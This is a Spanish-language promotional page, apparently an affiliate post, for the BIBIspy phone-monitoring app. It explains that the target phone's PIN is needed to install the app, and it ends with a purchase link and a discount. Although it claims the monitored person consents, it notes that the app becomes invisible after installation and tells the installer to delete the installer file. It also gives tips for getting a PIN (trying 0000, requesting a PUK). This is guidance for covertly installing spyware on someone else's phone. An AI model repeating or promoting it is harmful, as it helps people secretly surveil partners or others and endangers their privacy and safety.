Conocer mi código PIN para instalar BIBIspy

PREGUNTA

¿Hay forma de instalar BIBIspy sobre un teléfono móvil que somos incapaces de reiniciar ?

Me explico : Para poder reiniciar un teléfono móvil, en general hay conocer el código PIN. Sin dicho código PIN el teléfono permanecerá bloqueado en la página que pida la contraseña del dispositivo. Por eso el tema es importante : es fundamental conocer el código PIN del aparato para reiniciar el teléfono ya que el reinicio es indispensable para la correcta instalación de la aplicación BIBIspy,

REPUESTA

La respuesta a dichas preguntas es afirmativa:

  1. • Sí, hay que ser capaz de reiniciar el teléfono puesto que es indispensable reiniciarlo tras la instalación del programa.
  2. • Sí, hay que conocer el PIN del teléfono que se va a vigilar con la ayuda de BIBIspy.

¿Por qué ? Simplemente porque el programa está previsto para la vigilancia legal de un teléfono, desde el momento en el que el individuo al que se pretende vigilar a distancia da su consentimiento. BIBIsy no es por tanto un virus: se trata simplemente de una aplicación telefónica que permite la monitorización del teléfono que se desee rastrear desde el ordenador (o desde otro smartphone desde el que se pueda acceder a Internet).

codigo PIN

Descripción de Bibispy

¿POR QUÉ ?

El PIN, concretamente, es necesario por lo siguiente :

Una vez instalada la aplicación en el teléfono, (para ello, deberás estar provisto del teléfono, haber entrado en Internet desde tu navegador y habrás descargado el programa), la guía de instalación te pedirá que vuelvas a iniciarlo, es decir, apagarlo y volverlo a encender.

Al iniciarlo, aparecerá una pantalla de advertencia : dicha pantalla indica el inicio del programa y te pedirá que aceptes una carta. Después esta pantalla te pedirá que insertes tu clave personal. La clave personal se facilita previamente al comprar el programa.

Una vez validada la clave, la aplicación ya no resultará visible. No hay que olvidar borrar el fichero sobre el que has clicado para instalar la aplicación.

Conclusión

Resumiendo : si no conoces el código PIN del aparato, la próxima vez que el usuario lo reinicie, entrará directamente a esta pantalla de advertencia y se topará de frente con BIBYspy.
Antes de adquirir BIBUspy, verifica que puedes iniciar el teléfono.

Para comprar este programa, haz clic aquí

Cómo encontrar mi código PIN :

  • 1. Si el teléfono es nuevo, acabas de desembalarlo, y aún no te han dado el código PIN, intenta iniciarlo con el 0000 A menudo eso basta para resolver el problema.

 

  • 2. Si has olvidado tu código PIN y has tecleado erróneamente el número tres veces, deberás contactar con tu operador telefónico para desbloquear el móvil. Tras verificar tu identidad, se te dará un código PUK para que puedas volver a acceder y cambiar el código PIN. Ciertos operadores autorizan la recuperación de un código PUK por internet. Nota : Esta operación puede ser de pago.

Tre Fleccia

flagrante-delito

Bibispy es la aplicación de monitoreo más efectiva.

A través de este enlace promocional, obtendrá un 22% de descuento.

Pruébelo!

{ 0 comentarios… add one }

Deja un comentario

Next Post:

Previous Post:

Pin It on Pinterest

Share This